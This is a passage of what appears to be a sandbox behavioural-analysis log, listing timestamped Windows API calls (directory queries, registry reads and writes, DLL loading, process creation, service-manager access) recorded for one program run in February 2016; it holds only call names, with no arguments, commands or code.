"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,994", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,004", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,014", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,024", "api": "NtQueryDirectoryFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:36,034", "api": "CreateProcessInternalW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegSetValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 
17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegOpenKeyExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegQueryValueExW"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,034", "api": "RegCloseKey"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", 
"timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": 
"LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": 
"2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:36,044", "api": "LdrLoadDll"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtOpenFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:36,044", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": 
"NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryDirectoryFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,044", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,044", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryValueKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryDirectoryFile"}, {"category": "services", "timestamp": "2016-02-16 17:41:36,044", "api": "OpenSCManagerW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,044", "api": "NtQueryDirectoryFile"}, {"category": "services", "timestamp": "2016-02-16 